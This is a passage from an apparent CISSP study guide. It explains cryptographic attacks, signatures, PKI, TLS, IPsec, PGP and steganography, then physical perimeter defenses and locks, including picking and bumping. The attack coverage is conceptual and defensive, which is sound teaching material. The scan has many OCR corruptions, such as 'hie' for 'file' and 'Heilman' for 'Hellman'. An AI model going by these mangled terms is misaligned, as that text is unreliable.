typically does when faced with a suspect using cryptography: they obtain a search 
warrant and attempt to recover the key. 
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BRUTE FORCE 

A brute-force attack generates the entire key space, which is every possible key. 
Given enough time, the plaintext will be recovered. This is an effective attack against 
all key-based ciphers, except for the one-time pad. Since the key of a one-time pad 
is the same length as the plaintext, brute forcing every possible key will eventually 
recover the plaintext, but it will also produce vast quantities of other potential plain- 
texts, including all the works of Shakespeare. A cryptanalyst would have no way of 
knowing which potential plaintext is real. This is why the one-time pad is the only 
provably unbreakable form of crypto. 

SOCIAL ENGINEERING 

Social engineering uses the human mind to bypass security controls. This technique 
may be used to recover a key by tricking the key holder into revealing the key. 
Techniques are varied, and include impersonating an authorized user when calling 
a help desk, and requesting a password reset. Information Security Europe tried a 
more direct route by asking users for their password in exchange for a treat: “More 
than one in five London office workers who talked to a stranger outside a busy train 
station were willing to trade a password for a chocolate bar.” [26] 

RAINBOW TABLES 

A Rainbow Table is a pre-computed compilation of plaintexts and matching cipher- 
texts (typically passwords and their matching hashes). Rainbow tables greatly speed 
up many types of password cracking attacks, often taking minutes to crack where 
other methods (such as dictionary, hybrid, and brute force password cracking at- 
tempts) may take much longer. We will discuss these methods of password cracking 
in Chapter 6, Domain 5: Identity and Access Management. 

Many believe that rainbow tables are simply large databases of password/hash 
combinations. While this is how they appear to work (albeit at a typical speed of min- 
utes and not seconds or less per lookup), this is not how rainbow tables work internally. 

While pre-computation has obvious advantages, terabytes (or much more) would be 
required to store that much data using a typical database. All possible Microsoft LAN- 
MAN hashes and passwords would take roughly 48 terabytes of data to store; yet the 
Ophcrack rainbow table Linux live distribution (shown in Ligure 4.29) can crack 99% 
of LANMAN hashes using only 388 megabytes for table storage. How is this possible? 

Philippe Oechslin describes this challenge in his paper Making a Easter Cryptan- 
alytic Time-Memory Trade-Off: “Cryptanalytic attacks based on exhaustive search 
need a lot of computing power or a lot of time to complete. When the same attack 
has to be carried out multiple times, it may be possible to execute the exhaustive 
search in advance and store all results in memory. Once this precomputation is done, 
the attack can be carried out almost instantly. Alas, this method is not practicable 
because of the large amount of memory needed.” [27] 

Rainbow tables rely on a clever time/memory tradeoff. This technique was 
researched by Martin Heilman (of Diffie Heilman fame), and improved upon by 
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Table set: LM alphanum | Tables in use: 4 to 4 :100% | Passwords:3/9 | Time elapsed: 1690.18 

FIGURE 4.29 Ophcrack Windows Rainbow Table Linux Live Distribution 


Philippe Oechslin. Long chains of password-hash (plaintext-ciphertext) pairs are 
connected together. Thousands or millions of pairs may be connected into one chain 
(called a rainbow chain), and many chains may be formed, connected via a reduction 
function (which takes a hash and converts it into another possible password). At the 
end, everything in the chain may be removed, except the first and last entry. These 
chains may be rebuilt as needed, reconstituting all intermediate entries. This saves a 
large amount of storage, in exchange for some time and CPU cycles. 

KNOWN PLAINTEXT 

A known plaintext attack relies on recovering and analyzing a matching plaintext 
and ciphertext pair: the goal is to derive the key that was used. You may be wonder- 
ing why you would need the key if you already have the plaintext: recovering the key 
would allow you to decrypt other ciphertexts encrypted with the same key. 

CHOSEN PLAINTEXT AND ADAPTIVE CHOSEN PLAINTEXT 

A cryptanalyst chooses the plaintext to be encrypted in a chosen plaintext attack; 
the goal is to derive the key. Encrypting without knowing the key is done via an 
“encryption oracle,” or a device that encrypts without revealing the key. This may 
sound far-fetched, but it is quite practical: a VPN concentrator encrypts plaintext to 
ciphertext without revealing the key (only users authorized to manage the device 
may see the key). 

Adaptive-chosen plaintext begins with a chosen plaintext attack in round 1 . The 
cryptanalyst then “adapts” further rounds of encryption based on the previous round. 
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CHOSEN CIPHERTEXT AND ADAPTIVE CHOSEN CIPHERTEXT 

Chosen ciphertext attacks mirror chosen plaintext attacks: the difference is that the 
cryptanalyst chooses the ciphertext to be decrypted. This attack is usually launched 
against asymmetric cryptosystems, where the cryptanalyst may choose public docu- 
ments to decrypt that are signed (encrypted) with a user’s public key. 

Adaptive-chosen ciphertext also mirrors its plaintext cousin: it begins with a 
chosen ciphertext attack in round 1 . The cryptanalyst then “adapts” further rounds of 
decryption based on the previous round. 

MEET-IN-THE-MIDDLE ATTACK 

A meet-in-the-middle attack encrypts on one side, decrypts on the other side, and 
meets in the middle. The most common attack is against “double DES,” which 
encrypts with two keys in “encrypt, encrypt” order. The attack is a known plaintext 
attack: the attacker has a copy of a matching plaintext and ciphertext, and seeks to 
recover the two keys used to encrypt. 

The attacker generates every possible value for key 1 and uses each to encrypt 
the plaintext, saving the intermediate (half-encrypted) ciphertext results. DES has a 
56-bit key, so this will take 2 56 encryptions. 

The attacker then generates every possible value for key 2, and uses each to de- 
crypt the ciphertext. Once decrypted, the attacker looks up the intermediate cipher- 
text, looking for a match. If there is a match, the attacker has found both key 1 and 
key 2. The decryption step will take 2 56 attempts at most, for a total of 2 57 attempts 
(2 56 encryptions + up to 2 56 decryptions = 2 57 ). 

In other words, despite 112 bits of key length, breaking double DES is only twice 
as hard as breaking 56-bit single DES. This is far too easy, so double DES is not rec- 
ommended. 3TDES has a key length of 168 bits, but an effective strength of 112 bits 
due to the meet-in-the-middle attack: 3TDES has three keys and two “middles,” one 
can be used for a meet-in-the-middle attack, bypassing roughly one-third of the work. 

KNOWN KEY 

The term “known key attack” is misleading: if the cryptanalyst knows the key, the 
attack is over. Known key means the cryptanalyst knows something about the key, 
to reduce the efforts used to attack it. If the cryptanalyst knows that the key is an 
uppercase letter and a number only, other characters may be omitted in the attack. 

DIFFERENTIAL CRYPTANALYSIS 

Differential cryptanalysis seeks to find the “difference” between related plaintexts 
that are encrypted. The plaintexts may differ by a few bits. It is usually launched as 
an adaptive chosen plaintext attack: the attacker chooses the plaintext to be encrypted 
(but does not know the key), and then encrypts related plaintexts. 

The cryptanalyst then uses statistical analysis to search for signs of non-random- 
ness in the ciphertexts, zeroing in on areas where the plaintexts differed. Every bit 
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of the related ciphertexts should have a 50/50 chance of flipping: the cryptanalyst 
searches for areas where this is not true. Any such underlying order is a clue to 
recover the key. 

LINEAR CRYPTANALYSIS 

Linear cryptanalysis is a known plaintext attack where the cryptanalyst finds large 
amounts of plaintext/ciphertext pairs created with the same key. The pairs are studied 
to derive information about the key used to create them. 

Both differential and linear analysis can be combined as differential linear analysis. 

SIDE-CHANNEL ATTACKS 

Side-channel attacks use physical data to break a cryptosystem, such as monitoring 
CPU cycles or power consumption used while encrypting or decrypting. Some pur- 
ists may claim this is breaking some type of rule, but as Bruce Schneier said, “Some 
researchers have claimed that this is cheating. True, but in real-world systems, 
attackers cheat. Their job is to recover the key, not to follow some rules of conduct. 
Prudent engineers of secure systems anticipate this and adapt to it.” [28] 

IMPLEMENTATION ATTACKS 

An implementation attack exploits a mistake (vulnerability) made while implement- 
ing an application, service or system. Bruce Schneier describes implementation 
attacks as follows: “Many systems fail because of mistakes in implementation. Some 
systems don’t ensure that plaintext is destroyed after it’s encrypted. Other systems 
use temporary files to protect against data loss during a system crash, or virtual mem- 
ory to increase the available memory; these features can accidentally leave plaintext 
lying around on the hard drive. In extreme cases, the operating system can leave the 
keys on the hard drive. One product we’ve seen used a special window for password 
input. The password remained in the window’s memory even after it was closed. It 
didn’t matter how good that product’s cryptography was; it was broken by the user 
interface.” [29] 

BIRTHDAY ATTACK 

The birthday attack is named after the birthday paradox. The name is based on fact 
that in a room with 23 people or more, the odds are greater than 50% that two will 
share the same birthday. Many find this counterintuitive, and the birthday paradox 
illustrates why many people’s instinct on probability (and risk) is wrong. You are 
not trying to match a specific birthday (such as your’s); you are trying to match any 
birthday. 

If you are in a room full of 23 people, you have a 1 in 365 chance of sharing a 
birthday with each of the 22 other people in the room, for a total of 22/365 chances. 
If you fail to match, you leave the room and Joe has a 21/365 chance of sharing a 
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birthday with the remaining people. If Joe fails to match, he leaves the room and 
Morgan has a 20/365 chance, and so on. If you add 22/365 + 21/365 + 20/365 + 19/ 
365 ... + 1/365, you pass 50% probability. 

The birthday attack is used to create hash collisions. Just as matching your birth- 
day is difficult, finding a specific input with a hash that collides with another input 
is difficult. However, just like matching any birthday is easier, finding any input that 
creates a colliding hash with any other input is easier due to the birthday attack. 

KEY CLUSTERING 

A goal of any cryptographic cipher is that only one key can derive the plaintext from 
the ciphertext. Key Clustering occurs when two symmetric keys applied to the same 
plaintext produce the same ciphertext. This allows two different keys to decrypt the 
ciphertext. 


IMPLEMENTING CRYPTOGRAPHY 

Symmetric, asymmetric, and hash-based cryptography do not exist in a vacuum: 
they are applied in the real world, often in combination, to provide confidentiality, 
integrity, authentication, and nonrepudiation. 

DIGITAL SIGNATURES 

Digital signatures are used to cryptographically sign documents. Digital signatures 
provide nonrepudiation, which includes authentication of the identity of the signer, 
and proof of the document’s integrity (proving the document did not change). This 
means the sender cannot later deny (or repudiate) signing the document. 

Roy wants to send a digitally signed email to Rick. Roy writes the email, which 
is the plaintext. He then uses the SHA- 1 hash function to generate a hash value of the 
plaintext. He then creates the digital signature by encrypting the hash with his RSA 
private key. Figure 4.30 shows this process. Roy then attaches the signature to his 
plaintext email and hits send. 

Rick receives Roy’s email and generates his own SHA-1 hash value of the plain- 
text email. Rick then decrypts the digital signature with Roy’s RSA public key, 
recovering the SHA-1 hash Roy generated. Rick then compares his SHA-1 hash with 
Roy’s. Figure 4.31 shows this process. 


From: Roy Batty 
To: Rick Deckard 
Subject: Life 

I've seen things you people 
wouldn't believe. Attack ships on 
fire off the shoulder of Orion. 
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FIGURE 4.30 Creating a Digital Signature [30] 
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FIGURE 4.31 Verifying a Digital Signature 


If the two hashes match, Rick knows a number of things: 

1 . Roy must have sent the email (only Roy knows his private key). This 
authenticates Roy as the sender. 

2. The email did not change. This proves the integrity of the email. 

If the hashes match, Roy cannot later deny having signed the email. This is 
nonrepudiation. If the hashes do not match, Rick knows either Roy did not send it, or 
that the email’s integrity was violated. 


NOTE 

Digital signatures provide authentication and integrity, which forms nonrepudiation. They do not 
provide confidentiality: the plaintext remains unencrypted. 


MESSAGE AUTHENTICATE CODE 

A Message Authentication Code (MAC) is a hash function that uses a key. A com- 
mon MAC implementation is Cipher Block Chaining Message Authentication Code 
(CBC-MAC), which uses CBC mode of a symmetric block cipher such as DES to 
create a MAC. Message Authentication Codes provide integrity and authenticity 
(proof that the sender possesses the shared key). 

HMAC 

A Hashed Message Authentication Code (HMAC) combines a shared key with hash- 
ing. IPsec uses HMACs (see below). 

Two parties must pre-share a key. Once shared, the sender uses XOR to combine 
the plaintext with a shared key, and then hashes the output using an algorithm such 
as MD5 (called HMAC-MD5) or SHA-1 (called HMAC-SHA-1). That hash is then 
combined with the key again, creating an HMAC. 

The receiver combines the same plaintext with the shared key locally, and then 
follows the same process described above, resulting in a local HMAC. The receiver 
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compares that with sender’s HMAC. If the two HMACs match, the sender is authen- 
ticated (this proves the sender knows the shared key), and the message’s integrity is 
assured (the message has not changed). 

PUBLIC KEY INFRASTRUCTURE 

Public Key Infrastructure (PKI) leverages all three forms of encryption to provide 
and manage digital certificates. A digital certificate is a public key signed with a 
digital signature. Digital certificates may be server-based (used for SSL Web sites 
such as https://www.ebay.com, for example) or client-based (bound to a person). If 
the two are used together, they provide mutual authentication and encryption. The 
standard digital certificate format is X.509. 

NIST Special Publication 800-15 describes five components of PKI: 

• Certification Authorities (CAs) that issue and revoke certificates 

• Organizational Registration Authorities (ORAs) that vouch for the binding 
between public keys and certificate holder identities and other attributes 

• Certificate holders that are issued certificates and can sign digital documents 

• Clients that validate digital signatures and their certification paths from a known 
public key of a trusted CA 

• Repositories that store and make available certificates and Certificate 
Revocation Lists (CRLs) [31] 

Certificate Authorities and Organizational Registration Authorities 

Digital certificates are issued by Certificate Authorities (CAs). Organizational 
Registration Authorities (ORAs) authenticate the identity of a certificate holder 
before issuing a certificate to them. An organization may operate as a CA or ORA 
(or both). 

CAs may be private (run internally) or public (such as VeriSign or Thawte). 
Anyone off the street cannot simply request and receive a certificate for www.ebay. 
com, for example; they must prove that they have the authority to do so. This authen- 
tication is done by the CA, and can include business records research, emails sent to 
domain contacts, and similar methods. 

Certificate Revocation Lists 

The Certification Authorities maintain Certificate Revocation Lists (CRL), which, 
as the name implies, list certificates that have been revoked. A certificate may be 
revoked if the private key has been stolen, an employee is terminated, etc. A CRL is 
a flat file, and does not scale well. The Online Certificate Status Protocol (OCSP) is 
a replacement for CRLs, and uses client-server design that scales better. 

Key Management Issues 

Certificate Authorities issue digital certificates and distribute them to certificate 
holders. The confidentiality and integrity of the holder’s private key must be assured 
during the distribution process. 
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Public/private key pairs used in PKI should be stored centrally (and securely). 
Users may lose their private key as easily as they may forget their password. A lost 
private key that is not securely stored means that anything encrypted with the match- 
ing public key will be lost (short of cryptanalysis described previously). 

Note that key storage is different than key escrow. Key storage means the organi- 
zation that issued the public/private key pairs retains a copy. Key escrow, as we will 
discuss shortly, means a copy is retained by a third-party organization (and some- 
times multiple organizations), often for law enforcement purposes. 

A retired key may not be used for new transactions, but may be used to decrypt 
previously encrypted plaintexts. A destroyed key no longer exists, and cannot be 
used for any purpose. 


SSL AND TLS 

Secure Sockets Layer (SSL) brought the power of PKI to the Web. SSL authenticates 
and provides confidentiality to Web traffic. Transport Layer Security (TLS) is the 
successor to SSL. They are commonly used as part of HTTPS ( Hypertext Transfer 
Protocol Secure). 

When you connect to a Web site such as https://www.isc2.org/, the data is encrypt- 
ed. This is true even if you have not pre-shared a key: the data is encrypted out of the 
gate. This is done via asymmetric encryption: your browser downloads the digital cer- 
tificate of www.isc2.org, which includes the site’s public key, signed by the Certificate 
Authority ’ s private key. If your browser trusts the CA (such as VeriSign), then this sig- 
nature authenticates the site: you know it’s isc2.org and not a rogue site. Your browser 
then uses that public key to securely exchange a symmetric session key. The private 
key is stored on the isc2.org Web server, which allows it to decrypt anything encrypted 
with the public key. The symmetric key is then used to encrypt the rest of the session. 

The ciphers used for authentication, key exchange, and symmetric encryption are 
flexible: your browser will negotiate each with the server. Supported algorithms include 
(but are not limited to) RSA and Diffie-Hellman for key exchange, RSA and Digital Sig- 
nature Algorithm (DSA) for authentication, and AES and triple DES for confidentiality. 

SSL was developed for the Netscape Web browser in the 1990s. SSL 2.0 was 
the first released version; SSL 3.0 fixed a number of security issues with version 2. 
TLS was based on SSL 3.0. TLS is very similar to that version, with some security 
improvements. Although typically used for HTTPS to secure Web traffic, TLS may 
be used for other applications such as Internet chat and email client access. 


IPsec 

IPsec (Internet Protocol Security) is a suite of protocols that provide a cryptographic 
layer to both IPv4 and IPv6. It is one of the methods used to provide Virtual Private 
Networks (VPN), which allow you to send private data over an insecure network, such 
as the Internet (the data crosses a public network, but is “virtually private”). IPsec 
includes two primary protocols: Authentication Pleader (AH) and Encapsulating 
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Security Payload (ESP). AH and ESP provide different, and sometimes overlapping 
functionality. 

Supporting IPsec protocols include Internet Security Association and Key Man- 
agement Protocol (ISAKMP) and Internet Key Exchange (IKE). 


NOTE 

This chapter describes the cryptographic aspects of IPsec: see Chapter 5, Domain 4: 
Communication and Network Security) for the network-related aspects of IPsec. 


AH and ESP 

Authentication Header provides authentication and integrity for each packet of net- 
work data. AH provides no confidentiality; it acts as a digital signature for the data. 
AH also protects against replay attacks, where data is sniffed off a network and 
resent, often in an attempt to fraudulently reuse encrypted authentication credentials. 

Encapsulating Security Payload primarily provides confidentiality by encrypting 
packet data. It may also optionally provide authentication and integrity. 

Security Association and ISAKMP 

AH and ESP may be used separately or in combination. An IPsec Security Associa- 
tion (SA) is a simplex (one-way) connection that may be used to negotiate ESP or 
AH parameters. If two systems communicate via ESP, they use two SAs (one for 
each direction). If the systems leverage AH in addition to ESP, they use two more 
SAs, for a total of four. A unique 32-bit number called the Security Parameter Index 
(SPI) identifies each simplex SA connection. The Internet Security Association and 
Key Management Protocol (ISAKMP) manages the SA creation process. 

Tunnel and Transport Mode 

IPsec can be used in tunnel mode or transport mode. Tunnel mode is used by security 
gateways (which can provide point-to-point IPsec tunnels). ESP Tunnel mode 
encrypts the entire packet, including the original packet headers. ESP Transport 
mode only encrypts the data (and not the original headers); this is commonly used 
when the sending and receiving system can “speak” IPsec natively. 

AH authenticates the original IP headers, so it is often used (along with ESP) in 
transport mode, because the original headers are not encrypted. Tunnel mode typical- 
ly uses ESP alone (the original headers are encrypted, and thus protected, by ESP). 


NOTE 

IPsec is an example of a protocol built by committee, and that is not a compliment. It is overly 
complex, with multiple overlapping parts. Complexity is the enemy of security. See Bruce Schneier 
and Niels Ferguson’s A Cryptographic Evaluation of IPsec, where they argue that AH mode and 
transport mode should be removed entirely: “Our main criticism of IPsec is its complexity. IPsec 
contains too many options and too much flexibility; there are often several ways of doing the same 
or similar things.” [32] See: http://www.schneier.com/paper-ipsec.pdf 
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IKE 

IPsec can use a variety of encryption algorithms, such as MD5 or SHA-1 for integrity, 
and triple DES or AES for confidentiality. The Internet Key Exchange negotiates the 
algorithm selection process. Two sides of an IPsec tunnel will typically use IKE to 
negotiate to the highest and fastest level of security, selecting AES over single DES 
for confidentiality if both sides support AES, for example. 

PGP 

Pretty Good Privacy (PGP) brought asymmetric encryption to the masses. Phil Zim- 
merman created a controversy when he released PGP in 1991. For the first time, an 
average computer user could easily leverage the power of asymmetric encryption, 
which allows strangers (including criminals) to securely communicate without pre- 
sharing a key. 

Zimmerman was investigated for munitions export violations by the United 
States government after the PGP source code was posted to the Usenet bulletin board 
system in 1991. The prosecutors dropped the case in 1996. RSA complained to Zim- 
merman for including the (then) patented RSA algorithm in PGP. Zimmerman had 
encouraged users to pay RSA for a license if they used the algorithm. Zimmerman 
agreed to stop publishing PGP to address the patent issue (though copies were freely 
available from other sources). 

PGP provides the modern suite of cryptography: confidentiality, integrity, 
authentication, and nonrepudiation. It can be used to encrypt emails, documents, 
or an entire disk drive. PGP uses a Web of trust model to authenticate digital 
certificates, instead of relying on a central certificate authority (CA). If you trust 
that my digital certificate authenticates my identity, the Web of trust means you 
trust all the digital certificates that I trust. In other words, if you trust me, you trust 
everyone I trust. 

S/MIME 

MIME (Multipurpose Internet Mail Extensions) provides a standard way to format 
email, including characters, sets, and attachments. S/MIME (Secure/MIME) lever- 
ages PKI to encrypt and authenticate MIME-encoded email. The client or client’s 
email server (called an S/MIME gateway) may perform the encryption. 

ESCROWED ENCRYPTION 

Escrowed encryption means a third-party organization holds a copy of a public/pri- 
vate key pair. The private key is often divided into two or more parts, each held in 
escrow by different trusted third-party organizations, which will only release their 
portion of the key with proper authorization, such as a court order. This provides 
separation of duties. 

One goal of escrowed encryption is to offer a balance between an individual’s 
privacy, and the needs of law enforcement. Another goal is to ensure that encrypted 
data is recoverable in the event of key loss or employee termination. 
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Clipper Chip 

The Clipper Chip was the name of the technology used in the Escrowed Encryption 
Standard (EES), an effort announced in 1993 by the United States government to 
deploy escrowed encryption in telecommunications devices. The effort created a 
media firestorm, and was abandoned by 1996. 

The Clipper Chip used the Skipjack algorithm, a symmetric cipher that uses an 
80-bit key. The algorithm was originally classified as secret. The secrecy of the algo- 
rithm was another controversial issue: secrecy of an algorithm does not provide cryp- 
tographic strength, and secret ciphers are often found to be quite insecure. Skipjack 
was later declassified in 1998 (after the Clipper Chip effort had been abandoned). 

STEGANOGRAPHY 

Steganography is the science of hidden communication. The name is based on the 
Greek words “steganos” and “graphein,” which mean covered and write, or con- 
cealed writing. Encryption may provide confidentiality to a radio transmission, for 
example, but the communication itself is not hidden; only the meaning is concealed. 
Steganography hides the fact that communication is taking place. 

The ancient Greek historian Herodotus documented the first use of steganog- 
raphy in the Histories of Herodotus. Herodotus described shaving a slave’s head, 
tattooing instructions on it, waiting for the hair to grow back, and sending the slave 
across enemy lines. Another method hid a message inside a rabbit’s stomach. 

Modern steganography hides information inside data files, such as images. An 
8-bit bitmap has 256 colors, for example. Say two different white pixels (called WO 
and Wl) in the image appear identical to the naked eye. You may encode a message 
by treating WO and Wl as a bit stream. 

Assume the file has a sequence of pixels in this order: Wl, Wl, Wl, Wl, WO, 
WO, WO, Wl. You would like to encode “10101010” in the image. Treat WO as 
binary 0, and Wl as binary 1. Then flip the pixels accordingly, resulting in Wl, W0, 
Wl, W0, Wl, W0, Wl and W0. Figure 4.32 shows the process. A white arrow means 
the pixel was unchanged; black arrows represent changed pixels. 

The image now contains the hidden message “10101010,” though it appears the 
same to the naked eye (and the size has not changed). The integrity of the image has 
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FIGURE 4.32 Steganographic Substitution of Bitmap Pixels 
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changed. This method is called Substitution. Other methods include injection (add 
data to the file, creating a larger hie) and new hie creation. Substitution and Injection 
require a host hie, new hie creation creates a new hie, as the name implies. 

Messages that are hidden via steganography are often encrypted hrst, providing 
both conhdentiality of the data and secrecy of the communication. 

DIGITAL WATERMARKS 

Digital Watermarks encode data into a hie. The watermark may be hidden, using 
steganography. Watermarks are often used to hngerprint hies (tying a copy of a hie 
to its owner). 


LEARN BY EXAMPLE 

Academy Award Watermarks 

An example of real-world digital watermark use is the watermarking of DVDs by the Academy of 
Motion Picture Arts and Sciences. Members of the academy (who decide the recipients of Oscar 
awards) receive DVD “screeners” of nominated films. The films are often still being shown in 
movie theaters and not yet available on DVD (publicly). 

When the DVD system was first implemented, illegal copies of the screeners would appear on 
peer-to-peer file sharing networks. These copies were “ripped” (digitally copied) from the screeners. 

In response, the Academy of Motion Picture Arts and Sciences began watermarking each 
screener. Each DVD is customized for the recipient: every frame of every DVD contains a hidden 
watermark, tying the DVD to the recipient. Should the DVD appeal* on a P2P network, the academy 
can track the copy down the source DVD (and member who received it). 

In 2007, Salvador Nunez Jr. was arrested for posting the movie Flushed Away online, copied 
from an academy screener. Investigators used the watermark to track the copy to a screener received 
by his sister, who was a member of the academy. [33] 


PERIMETER DEFENSES 

Perimeter defenses help prevent, detect, and correct unauthorized physical access. 
Buildings, like networks, should employ defense-in-depth. Any one defense may 
fail: so critical assets should be protected by multiple physical security controls, 
such as fences, doors, walls, locks, etc. The ideal perimeter defense is safe, pre- 
vents unauthorized ingress, and when applicable offers both authentication and 
accountability. 

FENCES 

Fences may range from simple deterrents (such as 3-foot/l-meter tall fencing) to 
preventive devices, such as an 8-foot (2.4 meter) tall fence with barbed wire on top. 
Fences should be designed to steer ingress and egress to controlled points, such as 
exterior doors and gates. 
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GATES 

The gates shown in Table 4.17 range in strength from ornamental (a class I gate 
designed to deter access) to a class IV gate designed to prevent a car from crashing 
through (such as gates at airports and prisons). For more information, see ASTM 
International’s “ASTM F2200” Standard Specification for Automated Vehicular 
Gate Construction at http://www.astm.org/Standards/F2200.htm. 

Gates should be placed at controlled points at the perimeter. Secure sites use 
fences and topography to steer traffic to these points. 

BOLLARDS 

A traffic bollard is a strong post designed to stop a car. The term derives from the 
short/strong posts (called mooring bollards) used to tie ships to piers when docked. 
Figure 4.33 shows traffic bollards. 

Bollards are often installed in front of convenience stores, to prevent a confused 
driver who mixes up the accelerator and brake from driving into the store. They 
are used in secure facilities to prevent cars from entering (whether intentionally or 


Table 4.17 Types of Vehicle Gates 


Type 

Description 

Class 1 

Residential (home use) 

Class II 

Commercial/General Access (parking garage) 

Class III 

Industrial/Limited Access (loading dock for 18-wheeler trucks) 

Class IV 

Restricted Access (airport or prison) 



Source: http://commons.wikimedia.Org/wiki/File:Stainless_steel_bollard_SSP150.JPG. Photograph by Leda 
Vannaclip. Image under permission of Creative Commons Attribution ShareAlike 3.0. 
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not). Many secure facilities use large concrete planters for the same effect. These 
devices are usually placed in front of physically weak areas of a building, such as 
entryways. 


LIGHTS 

Lights can act as both a detective and deterrent control. A light that allows a guard to 
see an intruder is acting as a detective control. Criminals will usually favor a poorly 
lighted target over a more visible one, so light can also act as a deterrent. 

Light should be bright enough to illuminate the desired field of vision (the 
area being protected). Types of lights include Fresnel (pronounced fray-NELL) 
lights, named after Augustine-Jean Fresnel. These are the same type of lights 
originally used in lighthouses, which used Fresnel lenses to aim light in a specific 
direction. 

Light measurement terms include lumen: the amount of light one candle creates. 
Light was historically measured in foot-candles', one foot-candle is one lumen per 
square foot. Lux, based on the metric system, is more commonly used now: one lux 
is one lumen per square meter. 


CCTV 

Closed Circuit Television (CCTV) is a detective device used to aid guards in 
detecting the presence of intruders in restricted areas. CCTVs using the normal light 
spectrum require sufficient visibility to illuminate the held of view that is visible to 
the camera. Infrared devices can “see in the dark” by displaying heat. 

Older “tube cameras” are analog devices. Modern cameras use CCD (Charged 
Couple Discharge), which is digital. Cameras have mechanical irises that act as 
human irises, controlling the amount of light that enters the lens by changing the size 
of the aperture. Key issues include depth of field (the area that is in focus) and field 
of view (the entire area viewed by the camera). More light allows a larger depth of 
held because a smaller aperture places more of the image in focus. Correspondingly, 
a wide aperture (used in lower light conditions) lowers the depth of held. 

Figure 4.34 shows an image with a very narrow depth of held; a single line in a 
page of text is in focus. 

CCTV cameras may also have other typical camera features such as pan and 
tilt (moving horizontally and vertically). Figure 4.35 shows a CCD camera. CCTV 
displays may display a hxed camera view, auto scan (show a given camera for a few 
seconds before moving to the next), or multiplex (where multiple camera feeds are 
fed into one display). 

Magnetic tape such as VHS is used to back up images from tube cameras. CCD 
cameras use DVR (Digital Video Recorder) or NVR (Network Video Recorder) 
for backups. NVR uses TCP/IP to transmit data and has multiple advantages over 
other methods; including reusing existing TCP/IP networks and allowing centralized 
storage of all video data. 
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FIGURE 4.34 Depth of Field 

Source: http://commons.wikimedia. 0 rg/wiki/File:DOF-ShallowDepthofField.jpg. Photograph by PiccoloNamek. 

Image under permission of Creative Commons Attribution ShareAlike 3.0 Unported. 



Source: http://commons.wikimedia.Org/wiki/File:Camera-IMG_1961.JPG. Photograph by Rama. Image under 

permission of Creative Commons Attribution ShareAlike 2.0. 
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EXAM WARNING 


Tube cameras are sometimes called CRT (cathode ray tube) cameras. Do not confuse CRT cameras 
with CRT displays: while a CRT camera may be viewed on a CRT display, they are different 
devices. 


LOCKS 

Locks are a preventive physical security control, used on doors and windows to pre- 
vent unauthorized physical access. Locks may be mechanical, such as key locks or 
combination locks, or electronic, which are often used with smart cards or magnetic 
stripe cards. 

Key Locks 

Key locks require a physical key to unlock. Keys may be shared or sometimes copied, 
which lowers the accountability of key locks. Also, many keys contain the “combi- 
nation,” (called a bitting code) printed right on the bow of the key. The bitting code 
for the key in Figure 4.36 is 74226. The number represents the depth of the cut: 0 is 
shallow and 9 is quite deep. Copying this key is as simple as knowing the key type/ 
size and bitting code. Experts can deduce the code by simply looking at the key (or 
a photograph of one). 

A common type is the pin tumbler lock, as shown in Figure 4.37, which has two 
sets of pins: driver pins and key pins. The correct key makes the pins line up with the 
shear line, allowing the lock tumbler (plug) to turn. Using an incorrect key, as shown 
in Figure 4.38, results in misaligned pins, jamming the lock plug. 
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FIGURE 4.37 The Correct Key in a Pin Tumbler Lock 



FIGURE 4.38 The Incorrect Key in a Pin Tumbler Lock 


Ward or Warded locks must turn a key through channels (called wards); a 
“skeleton key” is designed to open varieties of warded locks. 

A spring-boll lock, shown in Figure 4.39, is a locking mechanism that “springs” 
in and out of the doorjamb; the door may be closed with the spring bolt exposed. A 
deadbolt is rigid; the door cannot be closed when the deadbolt is locked. Both types 
of bolts extend into the strike plate in the doorjamb. 

Lock Picking 

Lock picking is the art of opening a lock without a key. A set of lock picks, shown 
in Figure 4.40, can be used to lift the pins in a pin tumbler lock, allowing the 
attacker to open the lock without a key. A newer technique called lock bumping 
uses a shaved-down key that will physically fit into the lock. The attacker inserts 
the shaved key and “bumps” the exposed portion (sometimes with the handle of a 
screwdriver). This causes the pins to jump, and the attacker quickly turns the key 
and opens the lock. 

All key locks can be picked or bumped: the only question is how long it will 
take. Higher end locks will typically take longer to pick or bump. A risk analysis will 
determine the proper type of lock to use, and this “attack time” of a lock should be 
considered as part of the defense-in-depth strategy. 

Master and Core Keys 

The master key opens any lock for a given security zone in a building. Access to the 
master key should be tightly controlled, including the physical security of the key 
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FIGURE 4.40 Picking a Pin-Tumbler Lock 

Source: http://commons.wikimedia.Org/wiki/File:Pin_and_tumbler_lock_picking.PNG. Drawn by Teresa Knott. 

Image under permission of Creative Commons Attribution ShareAlike 3.0. 


itself, authorization granted to a few critical employees, and accountability whenever 
the key is used. 

The core key is used to remove the lock core in interchangeable core locks (where 
the lock core may be easily removed and replaced with another core). Once the lock 
core is removed, the door may often be opened with a screwdriver (in other words, 
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the core key can open any door). Since the core key is a functional equivalent to the 
master key, it should be kept equally secure. 

Combination Locks 

Combination locks have dials that must be turned to specific numbers, in a specific 
order (alternating clockwise and counterclockwise turns) to unlock. Simple com- 
bination locks are often used for informal security, like your gym locker. They are 
a weak form of physical access control for production environments such as data 
centers. Button or keypad locks also use numeric combinations. 

Limited accountability due to shared combinations is the primary security issue 
concerning these types of locks. Button or keypad locks are also vulnerable because 
prolonged use can cause wear on the most used buttons or keys. This could allow 
an attacker to infer numbers used in the combination. Also, combinations may be 
discovered via a brute-force attack, where every possible combination is attempted. 
These locks may also be compromised via shoulder surfing , where the attacker sees 
the combination as it is entered. 


LEARN BY EXAMPLE 

Hacking Pushbutton Locks 

The autumn 1991 issue of 2600 Magazine, The Hacker Quarterly discussed methods for attacking 
Simplex locks (article also available online at http://fringe.davesource.com/Fringe/QuasiLegal/ 
Simplex_Lockpicking.txt). 

A common model of Simplex pushbutton lock in use at the time had five buttons (numbered one 
through five). The buttons must be pressed in a specific combination in order to open. This type of 
lock typically used only one of 1081 different combinations. The authors point out that a Master 
Lock used for high school gym lockers has 64,000 combinations: the dial represents numbers 1 — 40, 
and must be turned three times (40 X 40 X 40 = 64,000). 

The authors were able to quickly determine the combination of a number of these locks via 
brute-force attacks. They discovered the combination used on drop boxes owned by a national 
shipping company, and then discovered the same combination opened every drop box on the east 
coast. They guessed the combination for another company’s drop boxes in one shot: the company 
never changed the default combination. 

Simple locks such as pushbutton locks with limited combinations do not qualify as preventive 
devices: they do little more than deter an educated attacker. These locks can be used for low- 
security applications such as locking an employee restroom, but should not be used to protect 
sensitive data or assets. 


SMART CARDS AND MAGNETIC STRIPE CARDS 

